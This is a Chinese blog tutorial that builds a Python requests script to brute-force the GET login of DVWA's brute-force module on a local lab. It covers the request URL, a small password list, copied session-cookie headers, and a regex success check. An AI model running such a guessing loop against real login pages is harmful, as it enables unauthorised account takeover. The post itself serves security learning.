Python编写简单GET暴力破解

2024-02-18 00:20

本文主要是介绍Python编写简单GET暴力破解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

最近简单学习了一下python的request模块,虽说简单,但是是思想的基础,值得实践一下,一步步发现错误一步步改正,记录一下过程
靶场为dvwa简单难度的暴力破解模块
python中的request包可以对网页发送请求以及接收回应,再结合循环,以此作为暴力破解的基础。整个代码流程为构造url,伪造headers,构造爆破字典,循环爆破

第一步,获取url

首先dvwa的暴力破解模块是get请求,所以直接先随便提交一组数据,复制它的url即可。(post暴力破解之后再做研究)

http://127.0.0.1/DVWA-master/vulnerabilities/brute/?username=admin&password=123&Login=Login#

问号后面是提交的数据,所以python中构造的基础url为

url = "http://127.0.0.1/DVWA-master/vulnerabilities/brute/"

第二步,构造字典

从第一步的url可以看出,我们要提交数据的变量名为username password Login,一共三个。爆破字典在python中一定为一个字典数组。每个字典中有三对键值。这里简单写几个就好了

payload = [{"username":"admin","password":"123","Login":"Login"},{"username":"admin","password":"admin","Login":"Login"},{"username":"admin","password":"password","Login":"Login"},{"username":"admin","password":"12345","Login":"Login"},]

第三步,发现问题,构造headers

首先我们得知道如果爆破成功与否,响应回来的东西有什么不同。
然后我们分别看一下,登录成功和登录失败的区别,这里就不额外构造错误的字典了,我的admin密码是12345,直接用payload里的第一个元素和最后一个元素。

先看登录失败,使用payload的中的第一个元素,用requests中的get方法

response = requests.get(url=url,params=payload[0])
result = response.content
print(result)

输出结果如下
在这里插入图片描述
发现很多\t\n,意识到是因为没有转化编码格式。重写一下

response = requests.get(url=url,params=payload[0])
result = response.content.decode('utf-8')
print(result)

然后看结果
在这里插入图片描述
然后同样方式,看一下登录成功

response = requests.get(url=url,params=payload[3])
result = response.content.decode('utf-8')
print(result)

结果
在这里插入图片描述

此时发现不对劲,两次结果一样。
仔细观察后,发觉这是dvwa的登录页面(login.php),并不是简单难度的暴力破解模块。然后想到自己没有构造请求头,因为没有cookie的原因需要重新登录dvwa。现在构造一下请求头。
用浏览器登录dvwa,设置难度之后,打开暴力破解模块,然后刷新页面,f12看一下响应头信息,我们需要cookie和user-agent
在这里插入图片描述
然后返回编译器,构造请求头。大小写要完完全全和浏览器回应的一样。

headers = {"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36","Cookie" : "security=low; PHPSESSID=sae57h8lmti1rp9bmi3l26sge7"
}

之后再测试成功和失败。在调用requests.get时多加一个headers的参数
先看成功:

response = requests.get(url=url,params=payload[3],headers=headers)
result = response.content.decode('utf-8')
print(result)

在这里插入图片描述
失败:

response = requests.get(url=url,params=payload[0],headers=headers)
result = response.content.decode('utf-8')
print(result)

在这里插入图片描述
不难看出,成功后有Welcome to the password protected area admin的字样

第四步,爆破

现在已经知道了爆破成功与否返回结果的不同。可以开始写爆破部分了。
首先要爆破,肯定是一个循环,循环次数便是数组字典的元素个数。
循环会逐个产生响应结果,从结果中我们只要利用万能的正则表达式提取出关键字“Welcome to the password protected area admin”就说明我们爆破成功。想要提取字符,就要把响应结果转为字符串,使用正则表达式还要引入re包。按照这个思路,就可以写出下面的代码:

partten = re.compile('Welcome to the password protected area admin')
for i in payload:response = requests.get(url=url, params=i, headers=headers)result = response.content.decode('utf-8')result = str(result)if len(re.findall(partten, result)) != 0 :print('爆破成功')print(i)

解释一下if判断。re.findall的返回结果是一个list,查到几个符合正则表达式的结果,这个list就有几个元素,对应如果没有查到,这个list的长度就为0,所以当list结果不为空时,即爆破成功。
在这里插入图片描述

这篇关于Python编写简单GET暴力破解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/719444

相关文章

如何使用 Python 读取 Excel 数据

《如何使用Python读取Excel数据》:本文主要介绍使用Python读取Excel数据的详细教程,通过pandas和openpyxl,你可以轻松读取Excel文件,并进行各种数据处理操... 目录使用 python 读取 Excel 数据的详细教程1. 安装必要的依赖2. 读取 Excel 文件3. 读

Python的time模块一些常用功能(各种与时间相关的函数)

《Python的time模块一些常用功能(各种与时间相关的函数)》Python的time模块提供了各种与时间相关的函数,包括获取当前时间、处理时间间隔、执行时间测量等,:本文主要介绍Python的... 目录1. 获取当前时间2. 时间格式化3. 延时执行4. 时间戳运算5. 计算代码执行时间6. 转换为指

利用Python调试串口的示例代码

《利用Python调试串口的示例代码》在嵌入式开发、物联网设备调试过程中,串口通信是最基础的调试手段本文将带你用Python+ttkbootstrap打造一款高颜值、多功能的串口调试助手,需要的可以了... 目录概述:为什么需要专业的串口调试工具项目架构设计1.1 技术栈选型1.2 关键类说明1.3 线程模

Python ZIP文件操作技巧详解

《PythonZIP文件操作技巧详解》在数据处理和系统开发中,ZIP文件操作是开发者必须掌握的核心技能,Python标准库提供的zipfile模块以简洁的API和跨平台特性,成为处理ZIP文件的首选... 目录一、ZIP文件操作基础三板斧1.1 创建压缩包1.2 解压操作1.3 文件遍历与信息获取二、进阶技

Python Transformers库(NLP处理库)案例代码讲解

《PythonTransformers库(NLP处理库)案例代码讲解》本文介绍transformers库的全面讲解,包含基础知识、高级用法、案例代码及学习路径,内容经过组织,适合不同阶段的学习者,对... 目录一、基础知识1. Transformers 库简介2. 安装与环境配置3. 快速上手示例二、核心模

Python正则表达式语法及re模块中的常用函数详解

《Python正则表达式语法及re模块中的常用函数详解》这篇文章主要给大家介绍了关于Python正则表达式语法及re模块中常用函数的相关资料,正则表达式是一种强大的字符串处理工具,可以用于匹配、切分、... 目录概念、作用和步骤语法re模块中的常用函数总结 概念、作用和步骤概念: 本身也是一个字符串,其中

Python使用getopt处理命令行参数示例解析(最佳实践)

《Python使用getopt处理命令行参数示例解析(最佳实践)》getopt模块是Python标准库中一个简单但强大的命令行参数处理工具,它特别适合那些需要快速实现基本命令行参数解析的场景,或者需要... 目录为什么需要处理命令行参数?getopt模块基础实际应用示例与其他参数处理方式的比较常见问http

python实现svg图片转换为png和gif

《python实现svg图片转换为png和gif》这篇文章主要为大家详细介绍了python如何实现将svg图片格式转换为png和gif,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录python实现svg图片转换为png和gifpython实现图片格式之间的相互转换延展:基于Py

Python中的getopt模块用法小结

《Python中的getopt模块用法小结》getopt.getopt()函数是Python中用于解析命令行参数的标准库函数,该函数可以从命令行中提取选项和参数,并对它们进行处理,本文详细介绍了Pyt... 目录getopt模块介绍getopt.getopt函数的介绍getopt模块的常用用法getopt模

Python利用ElementTree实现快速解析XML文件

《Python利用ElementTree实现快速解析XML文件》ElementTree是Python标准库的一部分,而且是Python标准库中用于解析和操作XML数据的模块,下面小编就来和大家详细讲讲... 目录一、XML文件解析到底有多重要二、ElementTree快速入门1. 加载XML的两种方式2.